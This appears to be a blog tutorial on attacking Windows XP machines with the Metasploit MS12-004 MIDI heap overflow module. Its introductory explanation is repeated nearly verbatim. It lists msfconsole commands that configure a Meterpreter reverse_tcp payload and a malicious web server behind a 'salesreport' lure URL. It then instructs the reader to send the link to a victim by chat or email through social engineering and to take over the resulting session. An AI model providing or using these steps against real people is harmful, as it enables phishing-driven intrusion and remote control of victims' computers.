What is Metasploit?
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
MS12_004 Midi Heap Overflow Exploit
This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Exploit Targets
Requirement
Process:
You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Exploit Targets
- Windows XP service pack 2
- Windows XP service pack 3
Requirement
- Attacker: Metasploit
- Victim PC: Windows XP
Process:
- Open Backtrack Terminal
- Type msfconsole
- Now type use exploit/windows/browser/ms12_004_midi
- Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp
- Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)
- Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)
- Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)
- Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)
- Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)
- Msf exploit (ms12_004_midi)>exploit
- Now an URL you should give to your victim http://192.168.1.4/salesreport
- Send the link of the server to the victim via chat or email or any social engineering technique.
You Now have access to the victims Computer. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Sign up here with your email
ConversionConversion EmoticonEmoticon